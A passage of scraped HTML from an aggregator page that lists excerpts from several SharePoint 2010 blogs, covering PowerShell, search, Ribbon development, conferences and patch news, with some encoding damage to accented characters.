<div class="entry-bound">PowerShell: Interact with SharePoint in the fastest way possible Written by: Margriet Bruggeman, Nikander Bruggeman. May 1, 2010 PowerShell: Interact with SharePoint in the fastest way possible Windows PowerShell is taking the administrative side of the Microsoft world by storm. What it is? An extensible automation engine built on top of the .NET Framework that allows administrators to perform administrative tasks. This is typically done via cmdlets (command lets) which are specialized .NET classes implementing a particular operation. The investments in PowerShell for SharePoint 2010 have&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.lcbridge.nl/vision/2010/fastsearch.htm" rel="bookmark" target="_blank">Fast Search Server 2010 for SharePoint: brief discussion</a></h3>

<div class="full-post">
<div class="published">31 Dec 1969 | 4:00 pm</div>
<div class="entry-content">
<div class="entry-bound">Fast Search Server 2010 for SharePoint: brief discussion Written by: Margriet Bruggeman, Nikander Bruggeman. May 1, 2010 Fast Search Server 2010 for SharePoint: brief discussion We're amazed at how many times we've been put in a position where we had to defend SharePoint search against customers, end users, and competitors. Questions like: Do you call that horrible thing a document preview? Why isn't faceted search not available out of the box, we're not going to use an open source project from codeplex in a production environment? Indexing document attachments is acting really weird, how&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.lcbridge.nl/vision/2010/wordservices.htm" rel="bookmark" target="_blank">Word Services: brief discussion</a></h3>

<div class="full-post">
<div class="published">31 Dec 1969 | 4:00 pm</div>
<div class="entry-content">
<div class="entry-bound">Word Services: brief discussion Written by: Margriet Bruggeman, Nikander Bruggeman. May 1, 2010 Word Services: brief discussion Word Services is a SharePoint service application, that can be run on one or more application servers within a SharePoint farm, that allows you to manipulate Word documents on the server without requiring the need to install Word on the server itself. Word Services also exposes the Word Services API, a managed object model, which runs on each WFE and allows developers to tap into this power via .NET languages such as C#. This allows you to initiate, stop, or monitor&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11169" class="feed-block 2669bbd9674469aceb948f5990a35eab">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.technet.com/b/tothesharepoint/" target="_blank" class="snap_shots">To the SharePoint</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/tothesharepoint/archive/2011/03/04/facilitating-content-upload-to-sharepoint-sites-a-tool-for-sharepoint-contributors.aspx" rel="bookmark" target="_blank">Facilitating content upload to SharePoint sites using SharePoint Workspace</a></h3>

<div class="full-post">
<div class="author">SharePoint Blog Admin</div>
<div class="published">4 Mar 2011 | 1:54 pm</div>
<div class="entry-content">
<div class="entry-bound">Network traffic, poor connectivity, and server downtime due to adverse conditions can interrupt communications with a SharePoint site. Such interruptions can make the process of updating a document on a SharePoint site frustrating for users. Content exchange with hosting servers can take longer than expected, even for minor updates, but especially when updates involve large or complex documents. And, if a network connection is tenuous, users could lose their changes while in the process of making them. Because user connectivity problems eventually come around to the supporting IT team, you&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/tothesharepoint/archive/2011/03/02/trying-to-decide-check-out-this-white-paper-quot-how-to-choose-the-right-business-intelligence-technology-to-suit-your-style-quot.aspx" rel="bookmark" target="_blank">Trying to decide which BI tool is best?</a></h3>

<div class="full-post">
<div class="author">Jhendr</div>
<div class="published">2 Mar 2011 | 4:32 am</div>
<div class="entry-content">
<div class="entry-bound">Trying to decide on which Business Intelligence application is best for your business?&nbsp; With all the choices available, do you know what style of BI is right for you? The white paper "How to Choose the Right Business Intelligence Technology to Suit Your Style" will help you with those questions and more. For the five different styles of BI --&nbsp;Self-Service Analysis, Business Reporting, Parameterized&nbsp;&amp; Operational Reporting, Performance Monitoring, and Scorecarding this white paper&nbsp;includes the following: Description and key characteristics.&nbsp; Each style is described&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/tothesharepoint/archive/2011/02/17/new-business-intelligence-scenario-hub-on-technet.aspx" rel="bookmark" target="_blank">Revamped business intelligence scenario hub on TechNet</a></h3>

<div class="full-post">
<div class="author">Nina Ruchirat</div>
<div class="published">17 Feb 2011 | 5:11 am</div>
<div class="entry-content">
<div class="entry-bound">The Microsoft Business Intelligence Center (http://technet.microsoft.com/bi) on TechNet has just been revamped. It is now a content hub featuring six end-to-end scenarios that highlight cross-product integrations for BI solutions. What makes this new hub unique is that it is a pilot for the new five-bucket lifecycle that TechNet is adopting, based around the Microsoft Operations Framework 4.0. This project was a partnership between TechNet and the content publishing teams for IT professionals and end users that are focused on SharePoint 2010 Products, SQL Server, and other products and&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/tothesharepoint/archive/2011/02/11/new-video-importing-federated-locations.aspx" rel="bookmark" target="_blank">New video: Importing Federated Locations</a></h3>

<div class="full-post">
<div class="author">Hal - MSFT</div>
<div class="published">11 Feb 2011 | 4:26 am</div>
<div class="entry-content">
<div class="entry-bound">Hal Zucati here with a video update to the following TechNet Library topics: Manage Federated Locations (SharePoint Server 2010) and Manage Federated Locations (Search Server 2010). I've created a short 5 minute video that demonstrates how to import a federated location using SharePoint Server 2010 or Search Server 2010. To view or download this video, click either of the TechNet Library topic links above. The video is at the bottom of the topic. Let us know what you think!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.technet.com/b/tothesharepoint/archive/2011/02/07/new-understanding-people-picker-and-custom-claims-providers.aspx" rel="bookmark" target="_blank">Understanding People Picker and custom claims providers</a></h3>

<div class="full-post">
<div class="author">Cern McAtee</div>
<div class="published">7 Feb 2011 | 6:15 am</div>
<div class="entry-content">
<div class="entry-bound">We recently&nbsp;published new content that describes the People Picker control and its relationship with custom claims providers. People Picker (shown below)&nbsp;is a Web control used to find and select users, groups, and claims and then grant them permissions to items such as lists, libraries, or sites in Microsoft SharePoint Server 2010 and Microsoft SharePoint Foundation 2010. &nbsp; In order to use People Picker effectively in your site collections, it is important to understand the relationship between People Picker and the authentication method used by the Web application that&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11170" class="feed-block 07704cd8447d90a7fb81e005dc13c2e9">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blog.mastykarz.nl" target="_blank" class="snap_shots">Waldek Mastykarz</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WaldekMastykarz/~3/2z6JtpndbIM/" rel="bookmark" target="_blank">Sample code: Asynchronously checking if a Ribbon command is available</a></h3>

<div class="full-post">
<div class="author">Waldek Mastykarz</div>
<div class="published">21 Feb 2011 | 7:54 am</div>
<div class="entry-content">
<div class="entry-bound">While extending SharePoint 2010 Ribbon with new functionality one of the common things you do is to check whether a command should be enabled or not. Since the checking function expects you to return a value it can get tricky if your custom checking operation is asynchronous. Find out how to asynchronously check if a Ribbon command is available. Last year fellow SharePoint MVP ... Andrew Connell posted a great tip about how you can asynchronously check if a command should be available or not. According to his approach you should return a safe default first (which in most cases is false),&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WaldekMastykarz/~3/Tp0cG6qpfOI/" rel="bookmark" target="_blank">Generating robots.txt files with Mavention Robots.txt</a></h3>

<div class="full-post">
<div class="author">Waldek Mastykarz</div>
<div class="published">20 Feb 2011 | 7:16 am</div>
<div class="entry-content">
<div class="entry-bound">Robots.txt files are a way to tell Web Robots which part of your site they should skip while scanning it. Although it...s not an official standard using robots.txt is a common approach used for Internet-facing websites to exclude pieces of your website from crawling. Find out how you can easily create and manage the robots.txt file with Mavention Robots.txt. What is Mavention Robots.txt? Mavention Robots.txt is a solution that allows you to easily manage the contents of the robots.txt file on your SharePoint web site. After deploying the Solution a new Site Collection Feature is installed.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WaldekMastykarz/~3/DISIshpQ1Ug/" rel="bookmark" target="_blank">How we did it: mavention.nl ... Part 5: Mavention RSS</a></h3>

<div class="full-post">
<div class="author">Waldek Mastykarz</div>
<div class="published">18 Feb 2011 | 5:05 am</div>
<div class="entry-content">
<div class="entry-bound">A part of building an Internet-facing website is notifying your visitors about new content. Using RSS/Atom feeds is a common way to deliver new content to your audience. Find out how we created RSS for our brand new website without a single line of custom code! One of the things that made it for the first release of our website was an RSS feed that would deliver the most recent content on our website to our readers. Based on the content that we would include in the first release, we wanted to provide a single RSS feed that would aggregate recent news and blog posts. As you might have know&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WaldekMastykarz/~3/_MJj6M2xAOc/" rel="bookmark" target="_blank">How we did it: mavention.nl ... Part 4: Optimizing for the Web</a></h3>

<div class="full-post">
<div class="author">Waldek Mastykarz</div>
<div class="published">12 Feb 2011 | 2:37 am</div>
<div class="entry-content">
<div class="entry-bound">Building Internet-facing websites on the SharePoint platform requires you not only to understand how SharePoint works but also to know what the Web is about and how things work there. In this part of the How we did it series about our brand new website I will show you some things that we implemented to make our website a better Web citizen. Intranet vs. Internet Developing Internet-facing websites is different than building intranet solutions. When building a solution for an intranet you know your audience. You know who they are and what technology they are using: you know for example if you&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/WaldekMastykarz/~3/SaAg_9gUDeo/" rel="bookmark" target="_blank">Mavention Meta Fields v1.1: no jQuery release</a></h3>

<div class="full-post">
<div class="author">Waldek Mastykarz</div>
<div class="published">11 Feb 2011 | 2:15 am</div>
<div class="entry-content">
<div class="entry-bound">A while ago I...ve released Mavention Meta Fields: a solution that makes it easy to add meta tags to Publishing Pages in SharePoint 2010. Shortly after the release it turned out that the dependency on jQuery was causing some problems in integrating the solution with existing environments using different versions of jQuery. After having received some feedback I decided to provide a quick fix: a version of the Mavention Meta Fields v1.1 solution without jQuery. Functionality-wise it...s exactly the same as the previously released version. The only difference is that you are responsible yourself&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11172" class="feed-block 4659cd22dbf7c6964a29013c6d0714eb">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.developpeur.org/themit/default.aspx" target="_blank" class="snap_shots">The Mit's Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.developpeur.org/themit/archive/2011/03/07/rappel-lien-vers-la-rtm-de-la-machine-de-demo-iw-soit-sp2010-quelques-kits-pour-d-buter.aspx" rel="bookmark" target="_blank">Rappel : lien vers la RTM de la machine de Demo IW, soit SP2010 + quelques kits pour d..buter</a></h3>

<div class="full-post">
<div class="author">themit</div>
<div class="published">7 Mar 2011 | 5:53 am</div>
<div class="entry-content">
<div class="entry-bound">Quelques clients m...ont redemand.. le lien de la machine de demo SP2010 de Microsoft Certes, vous la retrouvez rapidement par un moteur de recherche mais la plupart des posts parle de la version beta et le lien est d..sormais indisponible Hum hum, don......</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.developpeur.org/themit/archive/2011/03/03/sharepoint-2010-powershell-et-stsadm-les-quivalences.aspx" rel="bookmark" target="_blank">SharePoint 2010 : PowerShell et Stsadm, les ..quivalences</a></h3>

<div class="full-post">
<div class="author">themit</div>
<div class="published">3 Mar 2011 | 4:52 am</div>
<div class="entry-content">
<div class="entry-bound">Les bonnes vieilles habitudes ont souvent la vie dure ... Difficile de passer au tout PowerShell quand pendant des ann..es, STSADM a ..t.. votre meilleur compagnon Mais bon, il faut savoir ..voluer surtout quand le rempla..ant est largement meil...</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.developpeur.org/themit/archive/2010/11/18/teched-online-avez-vous-les-sessions-sharepoint-2010-vraiment-toute.aspx" rel="bookmark" target="_blank">TechEd Online : avez vous les sessions SharePoint 2010 ? Vraiment toute ?</a></h3>

<div class="full-post">
<div class="author">themit</div>
<div class="published">18 Nov 2010 | 6:47 am</div>
<div class="entry-content">
<div class="entry-bound">Une image est toujours plus parlante, non ? En r..sum.., tout pour profiter des derni..res session ou MAJ de session sur le sujet et directement depuis son bureau sa canap.. sa t..l.. sa baignoire (attention avec le chargeur ) La secti...</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.developpeur.org/themit/archive/2010/11/18/sharepoint-telerik-attention-aux-urls-absolues.aspx" rel="bookmark" target="_blank">SharePoint & Telerik : attention aux URLS absolues</a></h3>

<div class="full-post">
<div class="author">themit</div>
<div class="published">18 Nov 2010 | 3:15 am</div>
<div class="entry-content">
<div class="entry-bound">Je sors juste d...une probl..matique assez emb..tante pour ..tre relayer. Si vous utilisez WSS et/ou MOSS, vous devez ..tre au courant que l.....diteur de texte dans la CEWP, les champs de publishing et surtout dans les listes comme le WIKI ou les annonces n......</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.developpeur.org/themit/archive/2010/11/04/sp2010-le-search-center-sa-navigation-et-sa-master-page.aspx" rel="bookmark" target="_blank">SP2010 : Le Search Center, sa navigation et sa master page</a></h3>

<div class="full-post">
<div class="author">themit</div>
<div class="published">4 Nov 2010 | 11:41 am</div>
<div class="entry-content">
<div class="entry-bound">SharePoint 2010 a revu enti..rement la conception de ses mod..les par rapport .. MOSS 2007. Preuve en est le Wiki Enterprise qui vient remplacer le Collaboration Portal. C...est aussi le cas pour le Search Center. En manipulant un peu les configuration ave...</div>
</div>
</div>

</li>
</ul><ul id="feed11173" class="feed-block 6fd0406758e7772195afd525b5c9a8a7">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://community.bamboosolutions.com/blogs/" target="_blank" class="snap_shots">Bamboo Nation</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://community.bamboosolutions.com/blogs/bambooteamblog/archive/2011/03/08/bpc-2011-questions-from-the-bamboo-booth-quot-do-you-offer-installation-configuration-or-training-with-pmc-quot.aspx" rel="bookmark" target="_blank">BPC 2011: Questions from the Bamboo Booth &quot;Do You Offer Installation, Configuration or Training Services?&quot;</a></h3>

<div class="full-post">
<div class="author">Bob Young</div>
<div class="published">8 Mar 2011 | 11:30 am</div>
<div class="entry-content">
<div class="entry-bound">Hello again from the Best Practice Conference.&nbsp; There is so much going on today that I felt it was time for another update.&nbsp; We seem to be getting a lot of questions today at the booth regarding Professional Services.&nbsp; These questions are coming mostly from clients that have used us for a while and just have a new group of employees on board that they want to get up to speed.&nbsp; We have also had a&nbsp;few potential clients ask about us helping out with the initial installation and a run through of training.&nbsp; Being that our Professional Services are somewhat of a new&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://community.bamboosolutions.com/blogs/bambooteamblog/archive/2011/03/08/bpc-2011-please-save-the-pandas.aspx" rel="bookmark" target="_blank">BPC 2011: Please Save the Pandas</a></h3>

<div class="full-post">
<div class="author">Bob Young</div>
<div class="published">8 Mar 2011 | 11:00 am</div>
<div class="entry-content">
<div class="entry-bound">Hello Everybody out there in Bamboo Nation!&nbsp; I am reporting in from day 2 of the Best Practice Conference.&nbsp; We just finished breakfast and&nbsp;it has already turned into&nbsp;an extremely busy day&nbsp;at the booth!&nbsp; Everyone is coming by to snatch up the Bamboo Pandas that we are passing out and they are extremely upset that we only have a few left.&nbsp; Yes Bamboo Nation, this is the last run of our famous Bamboo Pandas.&nbsp;&nbsp;I want to call on everyone in the Nation to come together and join forces to save these Pandas.&nbsp; If you already have one or want to be able&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://community.bamboosolutions.com/blogs/bambooteamblog/archive/2011/03/08/spcorg-build-a-knowledge-base-in-10-minutes.aspx" rel="bookmark" target="_blank">SPCOrg: Build a Knowledge Base in 10 Minutes?</a></h3>

<div class="full-post">
<div class="author">Lily</div>
<div class="published">8 Mar 2011 | 7:45 am</div>
<div class="entry-content">
<div class="entry-bound">The first day of the SharePointConference.org in Baltimore wrapped up with Bamboo&#39;s session titled Accelerating Application Development in SharePoint.&nbsp; As promised in the title, we discussed how quickly a customizable application framework can be built through the use of components, accelerators, workflow and best practices for SharePoint.&nbsp; To demonstrate, we set out to build a corporate Knowledge Base on the spot, in 10 minutes. But sometimes demos don&#39;t work out exactly as planned.&nbsp; We did it in 8 minutes. With Julia Auletta at the helm of plain, vanilla SharePoint,&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://community.bamboosolutions.com/blogs/sharepoint-daily/archive/2011/03/08/sharepoint-daily-for-march-8-2011.aspx" rel="bookmark" target="_blank">&quot;Bamboo World Tour&quot; Day 1: Sydney, San Diego & Baltimore; Twitter Vital to SharePoint Success; Tech Titans Battle in the Cloud</a></h3>

<div class="full-post">
<div class="author">Chris Dooley</div>
<div class="published">8 Mar 2011 | 5:02 am</div>
<div class="entry-content">
<div class="entry-bound">Today at 12:45, Bamboo PM Girl and Angela Dillon will be&nbsp;presenting at the Best Practices SharePoint Conference in San Diego. Their session on &quot;Why Projects Fail? And How to Leverage SharePoint and Bamboo PM Central for Project Management&quot; will provide information on how to prevent your projects from failing as well as how to implement a project management in your organization. Top News StoriesTwitter Vital to SharePoint Success: Evangelists (ComputerWorld)Twitter has been integral to the popularity and adoption of SharePoint, according to evangelists of Microsoft&#39;s&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://community.bamboosolutions.com/blogs/bambooteamblog/archive/2011/03/08/auspc-2011-daniel-mcpherson-on-social-computing-meets-the-enterprise-in-sharepoint.aspx" rel="bookmark" target="_blank">AUSPC 2011: Daniel McPherson on 'Social Computing Meets the Enterprise' in SharePoint</a></h3>

<div class="full-post">
<div class="author">John Anderson</div>
<div class="published">7 Mar 2011 | 11:10 pm</div>
<div class="entry-content">
<div class="entry-bound">Beginning his presentation with the acknowledgment that there is a &quot;whole lot of snake oil with social computing,&quot; Daniel McPherson stated&nbsp;that his goal this afternoon&nbsp;was to boil social computing down to something that&#39;s realistic and useful to the enterprise.&nbsp; &quot;Social computing is where the knowledge management train dropped us off,&quot; Daniel observed, saying that today, &quot;knowledge management is driven by you and me and is being done outside companies&quot; via the various social networking sites which are available to users.&nbsp; Citing&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed22134" class="feed-block 40040621f51d551cb518ceb6a55c724d">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.blogger.com/profile/01045834510662143354" target="_blank" class="snap_shots">Andy Dale SharePoint Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndyDaleSharepointBlog/~3/_oYEqVLjwk0/sharepoint-in-cloud.html" rel="bookmark" target="_blank">SharePoint in the Cloud</a></h3>

<div class="full-post">
<div class="author">Office Talk</div>
<div class="published">18 Feb 2011 | 7:59 am</div>
<div class="entry-content">
<div class="entry-bound">Andy Gray with 'girly' hair. It...s been an interesting seven days for me that have included a lovely valentine...s night, a dose of Man-flu and the release of Office Talk...s exciting new Hosted SharePoint 2010 product ...Office Manager....&nbsp; A romantic valentine night was spent in a four-poster room overlooking the Wye Valley. This is of course a room containing a four-poster bed and not a room with four posters on the walls like I had when I was young; two Villa players (including the now disgraced Andy Gray), an Abba one and another of Lesley Judd from Blue Peter. &nbsp; But enough&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndyDaleSharepointBlog/~3/iriB4goY2Gg/sharepoint-templates-for-2010.html" rel="bookmark" target="_blank">SharePoint Templates for 2010</a></h3>

<div class="full-post">
<div class="author">Office Talk</div>
<div class="published">27 Jan 2011 | 2:04 pm</div>
<div class="entry-content">
<div class="entry-bound">It has been seven days since my last SharePoint blog and as football has proved this week seven days is a very long time. If we go back to twenty to five on Saturday afternoon when West Ham had just taken the lead at Everton putting the mighty Aston Villa in the relegation zone and Andy Gray was probably having a nice cup of tea without a care in the world. Now just five days on Villa are six points clear of the drop, Andy Gray is a bad boy looking for a new job and West Ham are now bottom of the league (again!). So things can change very quickly in only a few days and this is also true with&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndyDaleSharepointBlog/~3/CxZPeKW1jqk/sharepoint-lms.html" rel="bookmark" target="_blank">SharePoint LMS</a></h3>

<div class="full-post">
<div class="author">Office Talk</div>
<div class="published">18 Jan 2011 | 8:46 am</div>
<div class="entry-content">
<div class="entry-bound">In my blog this week I am going to talk about how your existing SharePoint can be used to successfully manage all your learning needs, but first a bit about my week. It...s been a strange week; becoming a ...sort of... Grandad, burying my cat, seeing the Villa in the relegation zone and putting my house up for sale. My step-daughter gave birth to a smashing baby named Edward at the weekend so a tiny Villa romper suit has been ordered. The Villa at least managed a draw against their local rivals so they are out of the drop zone for at least one week. Now after several days of tidying and&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndyDaleSharepointBlog/~3/VLEXIMW1rxE/sharepoint-refresher.html" rel="bookmark" target="_blank">SharePoint Refresher</a></h3>

<div class="full-post">
<div class="author">Office Talk</div>
<div class="published">7 Jan 2011 | 5:29 am</div>
<div class="entry-content">
<div class="entry-bound">Well, the last Christmas decoration are now back in the lofts and a post Christmas gloom has descended upon us. In the UK VAT (Value Added Tax) has gone up, petrol has gone up, the house market has tumbled and worse of all Aston Villa are in the relegation zone. But there is always someone worse off than you. I mean I could be an Australian cricketer !! Ricky Ponting,&nbsp;Dennis Lillee,&nbsp;Paul Hogan,&nbsp;Rolf Harris, Dame Edna Everage,&nbsp;Kylie Minogue,&nbsp;Germaine Greer and Bouncer from Neighbours are you reading? Your boys took one hell of a beating. Yes, after years of 'Pommie'&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndyDaleSharepointBlog/~3/uWv5QlrEqLA/about-sharepoint-has-moved.html" rel="bookmark" target="_blank">About SharePoint Has Moved</a></h3>

<div class="full-post">
<div class="author">Office Talk</div>
<div class="published">21 Oct 2010 | 8:19 am</div>
<div class="entry-content">
<div class="entry-bound">WE HAVE MOVED !! Thank you for following my SharePoint Blog, with a hint of Aston Villa, on blogger.com. The blog has now moved to be hosted on WordPress to allow for more videos, pictures and audios of my 'Brummie' voice. Please visit http://aboutsharepoint.com to find the latest postings including SharePoint TARDIS with a hint of Doctor Who and a real wedding celebration. Happy SharePointing.</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed26304" class="feed-block 9e13284527e88b26837d8b676a315cad">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.thesanitypoint.com" target="_blank" class="snap_shots">The Sanity Point</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/TheSanityPoint/~3/k8QAyBfDMT8/still-here-.aspx" rel="bookmark" target="_blank">Still here...</a></h3>

<div class="full-post">
<div class="author">Woody Windischman</div>
<div class="published">10 Feb 2011 | 4:22 am</div>
<div class="entry-content">
<div class="entry-bound">Hi guys - I'm still around, but fighting..a few more..&quot;CKS:EBE on SharePoint 2010&quot; issues than I expected (in what little spare time I have)...In particular the rich RSS feed (a critical bit, don't you think) doesn't appear to be working correctly. .. Don't worry, though, you haven't been forgotten, and I've got a couple cool post subjects already on tap.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/TheSanityPoint/~3/prZGtcDXBKY/pardon-our-dust.aspx" rel="bookmark" target="_blank">Pardon Our Dust!</a></h3>

<div class="full-post">
<div class="author">Woody Windischman</div>
<div class="published">22 Dec 2010 | 1:36 am</div>
<div class="entry-content">
<div class="entry-bound">Migration in Progress! Soon, The Sanity Point will be hosted on an all-new server. Watch for my year-end review once the transition is complete!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/TheSanityPoint/~3/K65DPxeVi8k/sharepoint-server-october-updates-are-back.aspx" rel="bookmark" target="_blank">SharePoint Server October Updates are Back</a></h3>

<div class="full-post">
<div class="author">Woody Windischman</div>
<div class="published">2 Dec 2010 | 10:45 am</div>
<div class="entry-content">
<div class="entry-bound">Everything Old is New Again! It is December, so as an early Christmas gift (or a late Halloween Treat, following the &quot;Now you see it - now you don't&quot; Trick), Microsoft has just re-released the October Cumulative Updates for SharePoint Server 2010 and Project Server 2010. You can get the full details from the SharePoint Team Blog. In other news, I'm finally going to be moving this blog into the 2010 realm from a hosting standpoint. The Community Kit for SharePoint: Enhanced Blog Edition, which I use to skin this site, block spam, and so on, is finally to the point where I can use it&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/TheSanityPoint/~3/s6-6pr4PvYk/some-updates.aspx" rel="bookmark" target="_blank">Some Updates</a></h3>

<div class="full-post">
<div class="author">Woody Windischman</div>
<div class="published">10 Nov 2010 | 3:55 am</div>
<div class="entry-content">
<div class="entry-bound">Patchwork and Light Reading I'm back from my haunted honeymoon cruise, and settling back into a &quot;normal&quot; routine. The SharePoint team at Microsoft have provided some supplemental information on their blog regarding the issues with the October Cumulative Update and have a workaround available if you installed it prior to the problems becoming known. As for my new book, Beginning SharePoint Designer 2010, it did start shipping while I was at sea. According to Amazon, it is proving to be quite popular. We even have our first review already - Five Stars! On behalf of Asif, Bryan, Marcy,&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/TheSanityPoint/~3/YXy7iH7DR68/alert-october-sharepoint-2010-patch-withdrawn.aspx" rel="bookmark" target="_blank">Alert - October SharePoint 2010 Patch Withdrawn</a></h3>

<div class="full-post">
<div class="author">Woody Windischman</div>
<div class="published">5 Nov 2010 | 10:29 am</div>
<div class="entry-content">
<div class="entry-bound">Microsoft, through the SharePoint Blog, has just announced that the October 2010 Cumulative Update for SharePoint Server 2010 and Project Server 2010 has been withdrawn pending resolution of a critical issue. If you have not yet installed the October 2010 CU, don't. If you have, please contact Microsoft Product Support for further instructions. Microsoft will be releasing further details as they become available.</div>
</div>
</div>

</li>
</ul><ul id="feed26473" class="feed-block 5c66c5c8660f0fee0a4d7a1f536e922d">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sharepointmagazine.net" target="_blank" class="snap_shots">SharePoint Magazine</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointMagazine/~3/fPRmeHg7k1s/governance-information-architecture-project-management-pick-any-two" rel="bookmark" target="_blank">Governance, Information Architecture, Project Management: Pick Any Two</a></h3>

<div class="full-post">
<div class="author">bjornadmin</div>
<div class="published">7 Mar 2011 | 8:01 pm</div>
<div class="entry-content">
<div class="entry-bound">In SharePoint Conversations, we ask our resident think-tank difficult questions or dilemmas and then ask them what they would do, say, or respond to these scenarios. You&#8217;re invited to join the conversation too; the tankers, as we lovingly call them, are here to offer their own personal opinions, but you are free to agree or disagree. After all, who said these people have all the right answers? In the forum, an excerpt from which you can see at the bottom of each topic, you can follow along with the discussion and voice your opinion. Don&#8217;t worry, there are rarely right or wrong&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointMagazine/~3/BfAyBriemnM/competition-aspiring-authors-2011" rel="bookmark" target="_blank">Competition: Aspiring Authors 2011</a></h3>

<div class="full-post">
<div class="author">Bj..rn Furuknap</div>
<div class="published">7 Mar 2011 | 10:30 am</div>
<div class="entry-content">
<div class="entry-bound">SharePoint Magazine has always been about community content, professionally edited, but ultimately coming from community authors. Many authors, however, never have the chance to be noticed by a large audience. Their blogs, containing valuable knowledge for both seasoned professionals and beginning SharePointers never make it into the spotlight. We want to inspire those authors to contribute great new content to the community and help them get the attention they deserve for their great work. We&#8217;re proud to announce our first Aspiring Authors competition. In this competition, we ask you,&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointMagazine/~3/BSQxKhq70nw/training-as-employee-perks" rel="bookmark" target="_blank">Training as Employee Perks</a></h3>

<div class="full-post">
<div class="author">Bj..rn Furuknap</div>
